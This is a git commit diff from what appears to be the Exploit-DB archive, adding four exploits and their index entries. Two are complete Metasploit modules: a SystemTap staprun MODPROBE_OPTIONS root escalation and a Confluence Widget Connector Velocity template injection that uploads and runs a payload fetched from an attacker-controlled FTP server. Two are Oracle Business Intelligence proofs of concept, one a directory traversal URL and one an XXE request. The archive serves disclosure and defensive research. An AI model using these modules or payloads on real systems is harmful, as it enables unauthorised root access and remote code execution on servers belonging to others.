DB: 2019-04-20
4 changes to exploits/shellcodes SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit) Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit) Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
This commit is contained in:
parent
ab955a9b5d
commit
aaf10d8566
5 changed files with 646 additions and 0 deletions
142
exploits/linux/local/46730.rb
Executable file
142
exploits/linux/local/46730.rb
Executable file
|
@ -0,0 +1,142 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Linux::Priv
|
||||
include Msf::Post::Linux::System
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module attempts to gain root privileges by exploiting a
|
||||
vulnerability in the `staprun` executable included with SystemTap
|
||||
version 1.3.
|
||||
|
||||
The `staprun` executable does not clear environment variables prior to
|
||||
executing `modprobe`, allowing an arbitrary configuration file to be
|
||||
specified in the `MODPROBE_OPTIONS` environment variable, resulting
|
||||
in arbitrary command execution with root privileges.
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
|
||||
systemtap 1.1-3.el5 on RHEL 5.5 (x64).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Tavis Ormandy', # Discovery and exploit
|
||||
'bcoles' # Metasploit
|
||||
],
|
||||
'DisclosureDate' => '2010-11-17',
|
||||
'References' =>
|
||||
[
|
||||
['BID', '44914'],
|
||||
['CVE', '2010-4170'],
|
||||
['EDB', '15620'],
|
||||
['URL', 'https://securitytracker.com/id?1024754'],
|
||||
['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],
|
||||
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],
|
||||
['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],
|
||||
['URL', 'https://bugs.launchpad.net/bugs/677226'],
|
||||
['URL', 'https://www.debian.org/security/2011/dsa-2348']
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'Arch' =>
|
||||
[
|
||||
ARCH_X86,
|
||||
ARCH_X64,
|
||||
ARCH_ARMLE,
|
||||
ARCH_AARCH64,
|
||||
ARCH_PPC,
|
||||
ARCH_MIPSLE,
|
||||
ARCH_MIPSBE
|
||||
],
|
||||
'SessionTypes' => ['shell', 'meterpreter'],
|
||||
'Targets' => [['Auto', {}]],
|
||||
'DefaultTarget' => 0))
|
||||
register_options [
|
||||
OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
|
||||
]
|
||||
register_advanced_options [
|
||||
OptBool.new('ForceExploit', [false, 'Override check result', false]),
|
||||
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
|
||||
]
|
||||
end
|
||||
|
||||
def staprun_path
|
||||
datastore['STAPRUN_PATH']
|
||||
end
|
||||
|
||||
def base_dir
|
||||
datastore['WritableDir'].to_s
|
||||
end
|
||||
|
||||
def upload(path, data)
|
||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||
rm_f path
|
||||
write_file path, data
|
||||
register_file_for_cleanup path
|
||||
end
|
||||
|
||||
def upload_and_chmodx(path, data)
|
||||
upload path, data
|
||||
chmod path
|
||||
end
|
||||
|
||||
def check
|
||||
# On some systems, staprun execution is restricted to stapusr group:
|
||||
# ---s--x---. 1 root stapusr 178488 Mar 28 2014 /usr/bin/staprun
|
||||
unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true'
|
||||
vprint_error "#{staprun_path} is not executable"
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "#{staprun_path} is executable"
|
||||
|
||||
unless setuid? staprun_path
|
||||
vprint_error "#{staprun_path} is not setuid"
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "#{staprun_path} is setuid"
|
||||
|
||||
CheckCode::Detected
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless check == CheckCode::Detected
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
|
||||
end
|
||||
print_warning 'Target does not appear to be vulnerable'
|
||||
end
|
||||
|
||||
if is_root?
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
|
||||
end
|
||||
end
|
||||
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
payload_name = ".#{rand_text_alphanumeric 10..15}"
|
||||
payload_path = "#{base_dir}/#{payload_name}"
|
||||
upload_and_chmodx payload_path, generate_payload_exe
|
||||
|
||||
config_path = "#{base_dir}/#{payload_name}.conf"
|
||||
upload config_path, "install uprobes /bin/sh"
|
||||
|
||||
print_status 'Executing payload...'
|
||||
res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}"
|
||||
vprint_line res
|
||||
end
|
||||
end
|
465
exploits/multiple/remote/46731.rb
Executable file
465
exploits/multiple/remote/46731.rb
Executable file
|
@ -0,0 +1,465 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::FtpServer
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
|
||||
'Description' => %q{
|
||||
Widget Connector Macro is part of Atlassian Confluence Server and Data Center that
|
||||
allows embed online videos, slideshows, photostreams and more directly into page.
|
||||
A _template parameter can be used to inject remote Java code into a Velocity template,
|
||||
and gain code execution. Authentication is unrequired to exploit this vulnerability.
|
||||
By default, Java payload will be used because it is cross-platform, but you can also
|
||||
specify which native payload you want (Linux or Windows).
|
||||
|
||||
Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
|
||||
6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.
|
||||
|
||||
This vulnerability was originally discovered by Daniil Dmitriev
|
||||
https://twitter.com/ddv_ua.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Daniil Dmitriev', # Discovering vulnerability
|
||||
'Dmitry (rrock) Shchannikov' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2019-3396' ],
|
||||
[ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],
|
||||
[ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],
|
||||
[ 'URL', 'https://paper.seebug.org/886/']
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],
|
||||
[ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],
|
||||
[ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'RPORT' => 8090,
|
||||
'SRVPORT' => 8021,
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Mar 25 2019',
|
||||
'DefaultTarget' => 0,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
|
||||
OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',
|
||||
'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
|
||||
])
|
||||
end
|
||||
|
||||
# Handles ftp RETP command.
|
||||
#
|
||||
# @param c [Socket] Control connection socket.
|
||||
# @param arg [String] RETR argument.
|
||||
# @return [void]
|
||||
def on_client_command_retr(c, arg)
|
||||
vprint_status("FTP download request for #{arg}")
|
||||
conn = establish_data_connection(c)
|
||||
if(not conn)
|
||||
c.put("425 Can't build data connection\r\n")
|
||||
return
|
||||
end
|
||||
|
||||
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
|
||||
case arg
|
||||
when /check\.vm$/
|
||||
conn.put(wrap(get_check_vm))
|
||||
when /javaprop\.vm$/
|
||||
conn.put(wrap(get_javaprop_vm))
|
||||
when /upload\.vm$/
|
||||
conn.put(wrap(get_upload_vm))
|
||||
when /exec\.vm$/
|
||||
conn.put(wrap(get_exec_vm))
|
||||
else
|
||||
conn.put(wrap(get_dummy_vm))
|
||||
end
|
||||
c.put("226 Transfer complete.\r\n")
|
||||
conn.close
|
||||
end
|
||||
|
||||
# Handles ftp PASS command to suppress output.
|
||||
#
|
||||
# @param c [Socket] Control connection socket.
|
||||
# @param arg [String] PASS argument.
|
||||
# @return [void]
|
||||
def on_client_command_pass(c, arg)
|
||||
@state[c][:pass] = arg
|
||||
vprint_status("#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}")
|
||||
c.put "230 Login OK\r\n"
|
||||
end
|
||||
|
||||
# Handles ftp EPSV command to suppress output.
|
||||
#
|
||||
# @param c [Socket] Control connection socket.
|
||||
# @param arg [String] EPSV argument.
|
||||
# @return [void]
|
||||
def on_client_command_epsv(c, arg)
|
||||
vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'")
|
||||
c.put("500 'EPSV #{arg}': command not understood.\r\n")
|
||||
end
|
||||
|
||||
# Returns a upload template.
|
||||
#
|
||||
# @return [String]
|
||||
def get_upload_vm
|
||||
(
|
||||
<<~EOF
|
||||
$i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
|
||||
EOF
|
||||
)
|
||||
end
|
||||
|
||||
# Returns a command execution template.
|
||||
#
|
||||
# @return [String]
|
||||
def get_exec_vm
|
||||
(
|
||||
<<~EOF
|
||||
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()
|
||||
EOF
|
||||
)
|
||||
end
|
||||
|
||||
# Returns checking template.
|
||||
#
|
||||
# @return [String]
|
||||
def get_check_vm
|
||||
(
|
||||
<<~EOF
|
||||
#{@check_text}
|
||||
EOF
|
||||
)
|
||||
end
|
||||
|
||||
# Returns Java's getting property template.
|
||||
#
|
||||
# @return [String]
|
||||
def get_javaprop_vm
|
||||
(
|
||||
<<~EOF
|
||||
$i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()
|
||||
EOF
|
||||
)
|
||||
end
|
||||
|
||||
# Returns dummy template.
|
||||
#
|
||||
# @return [String]
|
||||
def get_dummy_vm
|
||||
(
|
||||
<<~EOF
|
||||
EOF
|
||||
)
|
||||
end
|
||||
|
||||
# Checks the vulnerability.
|
||||
#
|
||||
# @return [Array] Check code
|
||||
def check
|
||||
checkcode = Exploit::CheckCode::Safe
|
||||
begin
|
||||
# Start the FTP service
|
||||
print_status("Starting the FTP server.")
|
||||
start_service
|
||||
|
||||
@check_text = Rex::Text.rand_text_alpha(5..10)
|
||||
res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
|
||||
if res && res.body && res.body.include?(@check_text)
|
||||
checkcode = Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
rescue Msf::Exploit::Failed => e
|
||||
vprint_error(e.message)
|
||||
checkcode = Exploit::CheckCode::Unknown
|
||||
end
|
||||
checkcode
|
||||
end
|
||||
|
||||
# Injects Java code to the template.
|
||||
#
|
||||
# @param service_url [String] Address of template to injection.
|
||||
# @return [void]
|
||||
def inject_template(service_url, timeout=20)
|
||||
|
||||
uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => uri,
|
||||
'headers' => {
|
||||
'Accept' => '*/*',
|
||||
'Origin' => full_uri(vhost_uri: true)
|
||||
},
|
||||
'ctype' => 'application/json; charset=UTF-8',
|
||||
'data' => {
|
||||
'contentId' => '1',
|
||||
'macro' => {
|
||||
'name' => 'widget',
|
||||
'body' => '',
|
||||
'params' => {
|
||||
'url' => datastore['TRIGGERURL'],
|
||||
'_template' => service_url
|
||||
}
|
||||
|
||||
}
|
||||
}.to_json
|
||||
}, timeout=timeout)
|
||||
|
||||
unless res
|
||||
unless service_url.include?("exec.vm")
|
||||
print_warning('Connection timed out in #inject_template')
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
if res.body.include? 'widget-error'
|
||||
print_error('Failed to inject and execute code:')
|
||||
else
|
||||
vprint_status("Server response:")
|
||||
end
|
||||
|
||||
vprint_line(res.body)
|
||||
|
||||
res
|
||||
end
|
||||
|
||||
# Returns a system property for Java.
|
||||
#
|
||||
# @param prop [String] Name of the property to retrieve.
|
||||
# @return [String]
|
||||
def get_java_property(prop)
|
||||
@prop = prop
|
||||
res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
|
||||
if res && res.body
|
||||
return clear_response(res.body)
|
||||
end
|
||||
''
|
||||
end
|
||||
|
||||
# Returns the target platform.
|
||||
#
|
||||
# @return [String]
|
||||
def get_target_platform
|
||||
return get_java_property('os.name')
|
||||
end
|
||||
|
||||
# Checks if the target os/platform is compatible with the module target or not.
|
||||
#
|
||||
# @return [TrueClass] Compatible
|
||||
# @return [FalseClass] Not compatible
|
||||
def target_platform_compat?(target_platform)
|
||||
target.platform.names.each do |n|
|
||||
if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)
|
||||
return true
|
||||
end
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
# Returns a temp path from the remote target.
|
||||
#
|
||||
# @return [String]
|
||||
def get_tmp_path
|
||||
return get_java_property('java.io.tmpdir')
|
||||
end
|
||||
|
||||
# Returns the Java home path used by Confluence.
|
||||
#
|
||||
# @return [String]
|
||||
def get_java_home_path
|
||||
return get_java_property('java.home')
|
||||
end
|
||||
|
||||
# Returns Java code that can be used to inject to the template in order to copy a file.
|
||||
#
|
||||
# @note The purpose of this method is to have a file that is not busy, so we can execute it.
|
||||
# It is meant to be used with #get_write_file_code.
|
||||
#
|
||||
# @param fname [String] The file to copy
|
||||
# @param new_fname [String] The new file
|
||||
# @return [void]
|
||||
def get_dup_file_code(fname, new_fname)
|
||||
if fname =~ /^\/[[:print:]]+/
|
||||
@command = "cp #{fname} #{new_fname}"
|
||||
else
|
||||
@command = "cmd.exe /C copy #{fname} #{new_fname}"
|
||||
end
|
||||
|
||||
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
|
||||
end
|
||||
|
||||
# Returns the normalized file path for payload.
|
||||
#
|
||||
# @return [String]
|
||||
def normalize_payload_fname(tmp_path, fname)
|
||||
# A quick way to check platform insteaf of actually grabbing os.name in Java system properties.
|
||||
if /^\/[[:print:]]+/ === tmp_path
|
||||
Rex::FileUtils.normalize_unix_path(tmp_path, fname)
|
||||
else
|
||||
Rex::FileUtils.normalize_win_path(tmp_path, fname)
|
||||
end
|
||||
end
|
||||
|
||||
# Exploits the target in Java platform.
|
||||
#
|
||||
# @return [void]
|
||||
def exploit_as_java
|
||||
|
||||
tmp_path = get_tmp_path
|
||||
|
||||
if tmp_path.blank?
|
||||
fail_with(Failure::Unknown, 'Unable to get the temp path.')
|
||||
end
|
||||
|
||||
@fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
|
||||
@b64 = Rex::Text.encode_base64(payload.encoded_jar)
|
||||
@command = ''
|
||||
|
||||
java_home = get_java_home_path
|
||||
|
||||
if java_home.blank?
|
||||
fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')
|
||||
else
|
||||
vprint_status("Found Java home path: #{java_home}")
|
||||
end
|
||||
|
||||
register_files_for_cleanup(@fname)
|
||||
|
||||
if /^\/[[:print:]]+/ === @fname
|
||||
normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')
|
||||
@command = %Q|#{normalized_java_path} -jar #{@fname}|
|
||||
else
|
||||
normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\bin\\java.exe')
|
||||
@fname.gsub!(/Program Files/, 'PROGRA~1')
|
||||
@command = %Q|cmd.exe /C "#{normalized_java_path}" -jar #{@fname}|
|
||||
end
|
||||
|
||||
print_status("Attempting to upload #{@fname}")
|
||||
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
|
||||
|
||||
print_status("Attempting to execute #{@fname}")
|
||||
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
|
||||
end
|
||||
|
||||
|
||||
# Exploits the target in Windows platform.
|
||||
#
|
||||
# @return [void]
|
||||
def exploit_as_windows
|
||||
tmp_path = get_tmp_path
|
||||
|
||||
if tmp_path.blank?
|
||||
fail_with(Failure::Unknown, 'Unable to get the temp path.')
|
||||
end
|
||||
|
||||
@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
|
||||
@fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
|
||||
new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
|
||||
@fname.gsub!(/Program Files/, 'PROGRA~1')
|
||||
new_fname.gsub!(/Program Files/, 'PROGRA~1')
|
||||
register_files_for_cleanup(@fname, new_fname)
|
||||
|
||||
print_status("Attempting to upload #{@fname}")
|
||||
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
|
||||
|
||||
print_status("Attempting to copy payload to #{new_fname}")
|
||||
get_dup_file_code(@fname, new_fname)
|
||||
|
||||
print_status("Attempting to execute #{new_fname}")
|
||||
@command = new_fname
|
||||
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
|
||||
end
|
||||
|
||||
|
||||
# Exploits the target in Linux platform.
|
||||
#
|
||||
# @return [void]
|
||||
def exploit_as_linux
|
||||
tmp_path = get_tmp_path
|
||||
|
||||
if tmp_path.blank?
|
||||
fail_with(Failure::Unknown, 'Unable to get the temp path.')
|
||||
end
|
||||
|
||||
@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
|
||||
@fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))
|
||||
new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))
|
||||
register_files_for_cleanup(@fname, new_fname)
|
||||
|
||||
print_status("Attempting to upload #{@fname}")
|
||||
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
|
||||
|
||||
@command = "chmod +x #{@fname}"
|
||||
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
|
||||
|
||||
print_status("Attempting to copy payload to #{new_fname}")
|
||||
get_dup_file_code(@fname, new_fname)
|
||||
|
||||
print_status("Attempting to execute #{new_fname}")
|
||||
@command = new_fname
|
||||
inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
|
||||
end
|
||||
|
||||
def exploit
|
||||
@wrap_marker = Rex::Text.rand_text_alpha(5..10)
|
||||
|
||||
# Start the FTP service
|
||||
print_status("Starting the FTP server.")
|
||||
start_service
|
||||
|
||||
target_platform = get_target_platform
|
||||
if target_platform.nil?
|
||||
fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run "check".')
|
||||
else
|
||||
print_status("Target being detected as: #{target_platform}")
|
||||
end
|
||||
|
||||
unless target_platform_compat?(target_platform)
|
||||
fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
|
||||
end
|
||||
|
||||
case target.name.downcase
|
||||
when /java$/
|
||||
exploit_as_java
|
||||
when /windows$/
|
||||
exploit_as_windows
|
||||
when /linux$/
|
||||
exploit_as_linux
|
||||
end
|
||||
end
|
||||
|
||||
# Wraps request.
|
||||
#
|
||||
# @return [String]
|
||||
def wrap(string)
|
||||
"#{@wrap_marker}\n#{string}#{@wrap_marker}\n"
|
||||
end
|
||||
|
||||
# Returns unwrapped response.
|
||||
#
|
||||
# @return [String]
|
||||
def clear_response(string)
|
||||
if match = string.match(/#{@wrap_marker}\n(.*)\n#{@wrap_marker}\n/m)
|
||||
return match.captures[0]
|
||||
end
|
||||
end
|
||||
end
|
13
exploits/windows/webapps/46728.txt
Normal file
13
exploits/windows/webapps/46728.txt
Normal file
|
@ -0,0 +1,13 @@
|
|||
# Exploit Title: Directory traversal in Oracle Business Intelligence
|
||||
# Date: 16.04.19
|
||||
# Exploit Author: @vah_13
|
||||
# Vendor Homepage: http://oracle.com
|
||||
# Software Link:
|
||||
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
|
||||
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
|
||||
# Tested on: Windows
|
||||
# CVE : CVE-2019-2588
|
||||
|
||||
PoC
|
||||
|
||||
http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
|
22
exploits/windows/webapps/46729.txt
Normal file
22
exploits/windows/webapps/46729.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher
|
||||
# Date: 16.04.19
|
||||
# Exploit Author: @vah_13
|
||||
# Vendor Homepage: http://oracle.com
|
||||
# Software Link:
|
||||
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
|
||||
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
|
||||
# Tested on: Windows
|
||||
# CVE : CVE-2019-2616 (7.2/10)
|
||||
|
||||
PoC:
|
||||
|
||||
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
|
||||
Host: host
|
||||
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101
|
||||
Firefox/62.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Content-Length: 76
|
||||
Content-Type: text/xml; charset=UTF-8
|
||||
|
||||
<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://IP/123 <http://ehost/123>
|
||||
">
|
|
@ -10428,6 +10428,7 @@ id,file,description,date,author,type,platform,port
|
|||
46717,exploits/windows/local/46717.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
|
||||
46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
|
||||
46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,
|
||||
46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -17344,6 +17345,7 @@ id,file,description,date,author,type,platform,port
|
|||
46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware,
|
||||
46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
|
||||
46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows,
|
||||
46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -41162,3 +41164,5 @@ id,file,description,date,author,type,platform,port
|
|||
46694,exploits/php/webapps/46694.txt,"DirectAdmin 1.561 - Multiple Vulnerabilities",2019-04-15,InfinitumIT,webapps,php,
|
||||
46706,exploits/hardware/webapps/46706.txt,"Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting",2019-04-16,"Aaron Bishop",webapps,hardware,80
|
||||
46710,exploits/php/webapps/46710.py,"Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion",2019-04-16,"Haboob Team",webapps,php,80
|
||||
46728,exploits/windows/webapps/46728.txt,"Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal",2019-04-19,"Vahagn Vardanyan",webapps,windows,
|
||||
46729,exploits/windows/webapps/46729.txt,"Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection",2019-04-19,"Vahagn Vardanyan",webapps,windows,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue